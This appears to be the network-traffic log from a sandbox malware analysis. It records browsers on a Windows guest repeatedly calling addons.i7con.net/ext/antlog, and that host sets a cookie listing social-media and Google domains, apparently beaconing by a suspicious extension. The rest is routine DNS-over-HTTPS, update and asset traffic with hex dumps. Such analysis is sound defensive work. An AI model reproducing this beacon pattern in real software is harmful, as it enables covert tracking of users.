                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                          2024-04-12 07:14:52 UTC1207INHTTP/1.1 200 OK
                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                          Date: Fri, 12 Apr 2024 07:12:11 GMT
                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          Access-Control-Expose-Headers: Penblock
                                                                                                                                          Block: 2
                                                                                                                                          Kenblock: enhjdmJubWFzZGZnaGprbHF3ZXJ0eXVpb3BaWENWQk5NQVNERkdISktMUVdFUlRZVUlPUDAxMjM0NTY3ODkrLz0=
                                                                                                                                          Penblock: 2-enhjdmJubWFzZGZnaGprbHF3ZXJ0eXVpb3BaWENWQk5NQVNERkdISktMUVdFUlRZVUlPUDAxMjM0NTY3ODkrLz0=
                                                                                                                                          Expires: Sat, 01 Jan 2000 00:00:00 GMT
                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                                          Pragma: no-cache
                                                                                                                                          Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                          Access-Control-Allow-Methods: POST, GET, OPTIONS, DELETE
                                                                                                                                          Set-Cookie: gxid=6618dd2fd6255; expires=Mon, 12-Apr-2027 07:12:11 GMT; Max-Age=94608000; path=/; domain=.i7con.net; secure; SameSite=None
                                                                                                                                          Set-Cookie: installed=true; expires=Sat, 12-Apr-2025 07:12:11 GMT; Max-Age=31536000; path=/; domain=.i7con.net; secure; SameSite=None
                                                                                                                                          Set-Cookie: clog=.facebook.com-.twitter.com-.instagram.com-www.google.com-accounts.google.com-ogs.google.com-.google.com-www.youtube.com-.youtube.com; expires=Sat, 12-Apr-2025 07:12:11 GMT; Max-Age=31536000; path=/; domain=.i7con.net; secure; SameSite=None
                                                                                                                                          Img-Error: undefined
                                                                                                                                          2024-04-12 07:14:52 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          12192.168.2.549756172.64.41.34436096C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-04-12 07:14:51 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                          Host: chrome.cloudflare-dns.com
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Content-Length: 128
                                                                                                                                          Accept: application/dns-message
                                                                                                                                          Accept-Language: *
                                                                                                                                          User-Agent: Chrome
                                                                                                                                          Accept-Encoding: identity
                                                                                                                                          Content-Type: application/dns-message
                                                                                                                                          2024-04-12 07:14:51 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                          Data Ascii: wwwgstaticcom)TP
                                                                                                                                          2024-04-12 07:14:52 UTC247INHTTP/1.1 200 OK
                                                                                                                                          Server: cloudflare
                                                                                                                                          Date: Fri, 12 Apr 2024 07:14:52 GMT
                                                                                                                                          Content-Type: application/dns-message
                                                                                                                                          Connection: close
                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                          Content-Length: 468
                                                                                                                                          CF-RAY: 87316c075db80caa-EWR
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          2024-04-12 07:14:52 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 0d 00 04 8e fa b0 c3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                          Data Ascii: wwwgstaticcom)


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          13192.168.2.54971923.106.238.2384431628C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-04-12 07:14:51 UTC550OUTGET /ext/antlog?1=1&from=Chrome1 HTTP/1.1
                                                                                                                                          Host: addons.i7con.net
                                                                                                                                          Connection: keep-alive
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          Accept: */*
                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          Cookie: gxid=6618dd2fd6255; installed=true; clog=.facebook.com-.twitter.com-.instagram.com-www.google.com-accounts.google.com-ogs.google.com-.google.com-www.youtube.com-.youtube.com
                                                                                                                                          2024-04-12 07:14:55 UTC1068INHTTP/1.1 200 OK
                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                          Date: Fri, 12 Apr 2024 07:12:13 GMT
                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          Access-Control-Expose-Headers: Penblock
                                                                                                                                          Block: 2
                                                                                                                                          Kenblock: enhjdmJubWFzZGZnaGprbHF3ZXJ0eXVpb3BaWENWQk5NQVNERkdISktMUVdFUlRZVUlPUDAxMjM0NTY3ODkrLz0=
                                                                                                                                          Penblock: 2-enhjdmJubWFzZGZnaGprbHF3ZXJ0eXVpb3BaWENWQk5NQVNERkdISktMUVdFUlRZVUlPUDAxMjM0NTY3ODkrLz0=
                                                                                                                                          Expires: Sat, 01 Jan 2000 00:00:00 GMT
                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                                          Pragma: no-cache
                                                                                                                                          Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                          Access-Control-Allow-Methods: POST, GET, OPTIONS, DELETE
                                                                                                                                          Set-Cookie: installed=true; expires=Sat, 12-Apr-2025 07:12:13 GMT; Max-Age=31536000; path=/; domain=.i7con.net; secure; SameSite=None
                                                                                                                                          Set-Cookie: clog=.facebook.com-.twitter.com-.instagram.com-www.google.com-accounts.google.com-ogs.google.com-.google.com-www.youtube.com-.youtube.com; expires=Sat, 12-Apr-2025 07:12:13 GMT; Max-Age=31536000; path=/; domain=.i7con.net; secure; SameSite=None
                                                                                                                                          Img-Error: undefined
                                                                                                                                          2024-04-12 07:14:55 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          14192.168.2.549762172.64.41.34436096C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-04-12 07:14:52 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                          Host: chrome.cloudflare-dns.com
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Content-Length: 128
                                                                                                                                          Accept: application/dns-message
                                                                                                                                          Accept-Language: *
                                                                                                                                          User-Agent: Chrome
                                                                                                                                          Accept-Encoding: identity
                                                                                                                                          Content-Type: application/dns-message
                                                                                                                                          2024-04-12 07:14:52 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                          Data Ascii: wwwgstaticcom)TP
                                                                                                                                          2024-04-12 07:14:52 UTC247INHTTP/1.1 200 OK
                                                                                                                                          Server: cloudflare
                                                                                                                                          Date: Fri, 12 Apr 2024 07:14:52 GMT
                                                                                                                                          Content-Type: application/dns-message
                                                                                                                                          Connection: close
                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                          Content-Length: 468
                                                                                                                                          CF-RAY: 87316c05193f4232-EWR
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          2024-04-12 07:14:52 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 2b 00 04 8e fb 28 e3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                          Data Ascii: wwwgstaticcom+()


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          15192.168.2.549749172.64.41.34436096C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-04-12 07:14:52 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                          Host: chrome.cloudflare-dns.com
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Content-Length: 128
                                                                                                                                          Accept: application/dns-message
                                                                                                                                          Accept-Language: *
                                                                                                                                          User-Agent: Chrome
                                                                                                                                          Accept-Encoding: identity
                                                                                                                                          Content-Type: application/dns-message
                                                                                                                                          2024-04-12 07:14:52 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                          Data Ascii: wwwgstaticcom)TP
                                                                                                                                          2024-04-12 07:14:53 UTC247INHTTP/1.1 200 OK
                                                                                                                                          Server: cloudflare
                                                                                                                                          Date: Fri, 12 Apr 2024 07:14:53 GMT
                                                                                                                                          Content-Type: application/dns-message
                                                                                                                                          Connection: close
                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                          Content-Length: 468
                                                                                                                                          CF-RAY: 87316c0aae6519e3-EWR
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          2024-04-12 07:14:53 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 1c 00 04 8e fb 28 c3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                          Data Ascii: wwwgstaticcom()


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          16192.168.2.549751162.159.61.34436096C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-04-12 07:14:54 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                          Host: chrome.cloudflare-dns.com
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Content-Length: 128
                                                                                                                                          Accept: application/dns-message
                                                                                                                                          Accept-Language: *
                                                                                                                                          User-Agent: Chrome
                                                                                                                                          Accept-Encoding: identity
                                                                                                                                          Content-Type: application/dns-message
                                                                                                                                          2024-04-12 07:14:54 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 09 64 61 74 61 2d 65 64 67 65 0b 73 6d 61 72 74 73 63 72 65 65 6e 09 6d 69 63 72 6f 73 6f 66 74 03 63 6f 6d 00 00 41 00 01 00 00 29 10 00 00 00 00 00 00 40 00 0c 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                          Data Ascii: data-edgesmartscreenmicrosoftcomA)@<
                                                                                                                                          2024-04-12 07:14:55 UTC247INHTTP/1.1 200 OK
                                                                                                                                          Server: cloudflare
                                                                                                                                          Date: Fri, 12 Apr 2024 07:14:55 GMT
                                                                                                                                          Content-Type: application/dns-message
                                                                                                                                          Connection: close
                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                          Content-Length: 468
                                                                                                                                          CF-RAY: 87316c15e93e4363-EWR
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          2024-04-12 07:14:55 UTC468INData Raw: 00 00 81 80 00 01 00 02 00 01 00 01 09 64 61 74 61 2d 65 64 67 65 0b 73 6d 61 72 74 73 63 72 65 65 6e 09 6d 69 63 72 6f 73 6f 66 74 03 63 6f 6d 00 00 41 00 01 c0 0c 00 05 00 01 00 00 0a 33 00 28 13 74 6d 2d 70 72 6f 64 2d 77 64 2d 63 73 70 2d 65 64 67 65 0e 74 72 61 66 66 69 63 6d 61 6e 61 67 65 72 03 6e 65 74 00 c0 41 00 05 00 01 00 00 01 2c 00 30 0f 70 72 6f 64 2d 61 67 69 63 2d 73 63 75 2d 31 0e 73 6f 75 74 68 63 65 6e 74 72 61 6c 75 73 08 63 6c 6f 75 64 61 70 70 05 61 7a 75 72 65 c0 2c c0 85 00 06 00 01 00 00 00 3c 00 30 06 6e 73 31 2d 30 31 09 61 7a 75 72 65 2d 64 6e 73 c0 2c 06 6d 73 6e 68 73 74 c0 22 00 00 27 11 00 00 03 84 00 00 01 2c 00 09 3a 80 00 00 00 3c 00 00 29 04 d0 00 00 00 00 00 e8 00 0c 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                          Data Ascii: data-edgesmartscreenmicrosoftcomA3(tm-prod-wd-csp-edgetrafficmanagernetA,0prod-agic-scu-1southcentraluscloudappazure,<0ns1-01azure-dns,msnhst"',:<)


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          17192.168.2.54976523.106.238.2384436096C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-04-12 07:14:55 UTC580OUTGET /ext/antlog?1=1&from=Chrome1 HTTP/1.1
                                                                                                                                          Host: addons.i7con.net
                                                                                                                                          Connection: keep-alive
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                          Accept: */*
                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                          Cookie: installed=true; gxid=6618dd2fd6255; clog=.facebook.com-.twitter.com-.instagram.com-www.google.com-accounts.google.com-ogs.google.com-.google.com-www.youtube.com-.youtube.com
                                                                                                                                          2024-04-12 07:14:57 UTC1068INHTTP/1.1 200 OK
                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                          Date: Fri, 12 Apr 2024 07:12:16 GMT
                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          Access-Control-Expose-Headers: Penblock
                                                                                                                                          Block: 2
                                                                                                                                          Kenblock: enhjdmJubWFzZGZnaGprbHF3ZXJ0eXVpb3BaWENWQk5NQVNERkdISktMUVdFUlRZVUlPUDAxMjM0NTY3ODkrLz0=
                                                                                                                                          Penblock: 2-enhjdmJubWFzZGZnaGprbHF3ZXJ0eXVpb3BaWENWQk5NQVNERkdISktMUVdFUlRZVUlPUDAxMjM0NTY3ODkrLz0=
                                                                                                                                          Expires: Sat, 01 Jan 2000 00:00:00 GMT
                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                                          Pragma: no-cache
                                                                                                                                          Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                          Access-Control-Allow-Methods: POST, GET, OPTIONS, DELETE
                                                                                                                                          Set-Cookie: installed=true; expires=Sat, 12-Apr-2025 07:12:16 GMT; Max-Age=31536000; path=/; domain=.i7con.net; secure; SameSite=None
                                                                                                                                          Set-Cookie: clog=.facebook.com-.twitter.com-.instagram.com-www.google.com-accounts.google.com-ogs.google.com-.google.com-www.youtube.com-.youtube.com; expires=Sat, 12-Apr-2025 07:12:16 GMT; Max-Age=31536000; path=/; domain=.i7con.net; secure; SameSite=None
                                                                                                                                          Img-Error: undefined
                                                                                                                                          2024-04-12 07:14:57 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          18192.168.2.54975520.12.23.50443
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-04-12 07:14:57 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=Cxs3NSu92DAgRPg&MD=sCpdzsBH HTTP/1.1
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Accept: */*
                                                                                                                                          User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                                          Host: slscr.update.microsoft.com


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          19192.168.2.54977013.107.213.404436096C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-04-12 07:15:02 UTC601OUTGET /assets/edge_hub_apps_manifest_gz/4.7.107/asset?sv=2017-07-29&sr=c&sig=R83mlHRCqeHRG9T0loza5cz3U8zjuZzQy2wVvoSHGHw%3D&st=2021-01-01T00%3A00%3A00Z&se=2024-06-30T00%3A00%3A00Z&sp=r&assetgroup=Shoreline HTTP/1.1
                                                                                                                                          Host: edgeassetservice.azureedge.net
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Edge-Asset-Group: Shoreline
                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                          2024-04-12 07:15:03 UTC683INHTTP/1.1 200 OK
                                                                                                                                          Date: Fri, 12 Apr 2024 07:15:03 GMT
                                                                                                                                          Content-Type: application/octet-stream
                                                                                                                                          Content-Length: 306698
                                                                                                                                          Connection: close
                                                                                                                                          Content-Encoding: gzip
                                                                                                                                          Content-MD5: DLY06IpEajvyCGoNUcMp0A==
                                                                                                                                          Last-Modified: Tue, 10 Oct 2023 17:24:31 GMT
                                                                                                                                          ETag: "0x8DBC9B5C40EBFF4"
                                                                                                                                          x-ms-request-id: 708b60b3-b01e-0075-6ea4-8cefbc000000
                                                                                                                                          x-ms-version: 2017-07-29
                                                                                                                                          x-ms-lease-status: unlocked
                                                                                                                                          x-ms-lease-state: available
                                                                                                                                          x-ms-blob-type: BlockBlob
                                                                                                                                          x-ms-server-encrypted: true
                                                                                                                                          x-azure-ref: 20240412T071503Z-1586dc58458lqmrnkddmgsfnsg0000000390000000006drn
                                                                                                                                          Cache-Control: public, max-age=604800
                                                                                                                                          x-fd-int-roxy-purgeid: 59346683
                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                          X-Cache-Info: L1_T2
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          2024-04-12 07:15:03 UTC15701INData Raw: 1f 8b 08 08 cf 88 25 65 02 ff 61 73 73 65 74 00 ec 7d 69 93 db 46 92 e8 5f a9 f0 97 fd e0 96 05 10 00 09 4c c4 8b 17 2d f9 92 6d f9 92 6d 8d fd 66 43 51 00 0a 24 9a 20 40 e1 60 ab 7b 76 fe fb ab cc 2c 10 09 82 07 c8 a6 bc 9e 8d 0d 5b 68 b0 8e bc eb 44 55 e6 3f 3f 59 c9 3c 4d 54 55 bf db a8 b2 4a 8b fc 93 bf 89 4f dc cf ac cf ac 4f 6e c4 27 8b 26 7c 27 d7 eb 4a 27 fe bf 7f 7e 92 c6 90 19 c5 ee d4 f7 65 f0 4c f9 be ff cc f5 95 7c 26 63 df 7e 36 9b da 81 13 7b d3 d0 0e 15 d4 cd e5 4a 41 f9 77 ef 5e bf f9 ea 1d fc 7a f7 0e d2 19 1e fb 33 fd df 0c 12 63 55 45 65 ba ae 4d 06 d5 61 89 54 75 a9 1e 20 f7 f5 ab 57 2f 5e dd dd 7e ff 62 be 7c bf 58 a6 5f 05 f7 d6 8b db 9f be f8 f2 f6 f6 87 97 b7 3f f9 b7 90 ff 72 fe ad 7e ff e2 76 9d 58 77 ee 57 8b 1f de ff 14 f9 fe
                                                                                                                                          Data Ascii: %easset}iF_L-mmfCQ$ @`{v,[hDU??Y<MTUJOOn'&|'J'~eL|&c~6{JAw^z3cUEeMaTu W/^~b|X_?r~vXwW
                                                                                                                                          2024-04-12 07:15:03 UTC16384INData Raw: 10 12 6b 16 46 21 5c 8d 08 33 26 a5 f9 ac a5 1b 4e 2d 31 b0 b2 19 13 6b cc 28 62 f6 d8 13 a5 64 e6 6d b1 8e c0 39 d0 3b 1d 35 ac cb 14 39 34 2c de 27 0f 25 e7 bb dc ec 8e 4d 1e 0f 36 52 62 6f 5c f3 a4 79 e4 26 bd 6c 1e f9 fd e2 1f 8d ad 73 72 b1 a6 b7 19 44 b0 85 7d 4c 10 b7 ad e2 24 9f 8b e5 22 a5 38 7d a8 02 c7 0a 04 ba b8 75 26 ce 55 c2 08 bf 5c 90 e7 68 0d 8c 7c 07 bb 14 ee 07 cf ac 5b ca 81 54 5b 25 f6 36 51 93 15 e8 c2 2b 22 50 fc 52 36 6d 55 35 59 19 67 e4 56 be d8 2d df fd 8c 1c b1 48 e9 85 d8 d5 6f a1 88 16 05 b8 ea d5 42 20 2f c6 fa c5 ab 21 ae b4 7e 71 4c 7c 69 3b da be 2c c4 3c 45 31 58 f6 5a d0 75 29 2d 10 91 2f b6 81 a8 f1 77 27 4d cb 46 c3 d1 f2 cb e7 17 7d 3c d0 6a 30 b1 ed 19 11 24 85 30 ed b3 77 98 0a a3 d3 4d 8a a4 58 a6 1a 92 6f 39 a0
                                                                                                                                          Data Ascii: kF!\3&N-1k(bdm9;594,'%M6Rbo\y&lsrD}L$"8}u&U\h|[T[%6Q+"PR6mU5YgV-HoB /!~qL|i;,<E1XZu)-/w'MF}<j0$0wMXo9
                                                                                                                                          2024-04-12 07:15:03 UTC16384INData Raw: 8f a8 73 23 08 e3 58 1f 65 03 0a 6c ce 32 d6 42 d5 72 5c 56 48 b3 23 8d 34 db 40 60 d6 45 60 49 c9 d4 bd 2e 7c 11 fb b2 a6 99 50 03 fa 25 54 f6 38 cb 53 99 1f 8f 3a eb 83 6a 5b 35 cb f3 ab 69 39 53 0b a1 22 dd ab d0 a3 8d e4 30 22 b3 5a 41 6f 44 0d 8c d6 9b eb 15 92 ab ef 54 e1 d5 35 3b 8a 08 94 56 c6 75 11 82 12 e0 b7 2c 9c d4 28 cd 82 09 ad 54 24 d2 ae 26 b9 4f 37 c4 67 1e 9d 6b d1 e4 03 44 91 0f c7 24 3e 9c a5 f8 80 ce e1 c3 bd 55 1f 7c 0d 7d f0 d6 f4 e1 f6 6d f9 6c 42 78 a7 7a 8f cf 80 2a 42 b1 ca af 46 95 01 06 85 53 be 7a 50 c8 12 ce 7e 7c 44 29 29 63 83 14 66 50 e5 69 9e ba 94 a2 14 a9 44 53 56 22 78 06 d0 d3 7d 25 3d 51 7e fc 63 e8 77 69 11 9c 24 cb 92 42 e9 e0 d4 ac cc c6 c2 0a 92 55 72 f4 61 88 91 31 1f 4c 69 b4 9b 0f a5 64 32 91 6a 99 5a 87 05
                                                                                                                                          Data Ascii: s#Xel2Br\VH#4@`E`I.|P%T8S:j[5i9S"0"ZAoDT5;Vu,(T$&O7gkD$>U|}mlBxz*BFSzP~|D))cfPiDSV"x}%=Q~cwi$BUra1Lid2jZ
                                                                                                                                          2024-04-12 07:15:03 UTC16384INData Raw: 61 bb 9d 15 71 6e 34 aa d2 1f f1 f4 87 2d 18 7a 66 85 3e 37 ec dc 4e 90 a6 cb a0 fa 98 d0 04 bd 87 c0 76 a3 e3 10 e7 62 b1 45 8c d3 7f ce e6 7b 31 e3 f2 79 31 db e2 c5 79 85 08 d3 dc 48 52 f5 b6 dd ed 28 17 25 ea d4 61 9c b8 97 49 3a d3 92 94 d0 6f 22 de 01 7f 8b 0d 3f 51 42 08 7f 2e 10 03 ae dd 15 3e 36 a4 6a 67 7e 2a 42 7f 7e 14 be 1b ef d2 39 b9 d3 a0 0f a6 db fd c0 cf 6a 73 b5 e6 a0 67 39 bd 50 cf ce e5 f5 33 b4 5b f6 96 18 f6 1d 3d 5b 1c 62 ee 08 9c b4 27 31 5c bf 95 0d 07 a0 cf bc bf ec e9 f3 e3 25 7d d1 cd 7e e8 fe 69 3f 94 32 74 6d 41 40 30 f4 9d 21 ef 18 ab 09 e0 e5 30 bf 56 97 43 99 8d fb 5c b1 3a 15 2a 0c 9d 5f c9 d3 47 70 60 b0 6e 17 9c 16 bc 33 94 8f dc 87 1c 2e 65 5f 80 b0 c7 e2 bb 6a f4 3b c8 60 00 83 b2 83 02 16 e1 3f 69 68 e4 62 45 17 99
                                                                                                                                          Data Ascii: aqn4-zf>7NvbE{1y1yHR(%aI:o"?QB.>6jg~*B~9jsg9P3[=[b'1\%}~i?2tmA@0!0VC\:*_Gp`n3.e_j;`?ihbE
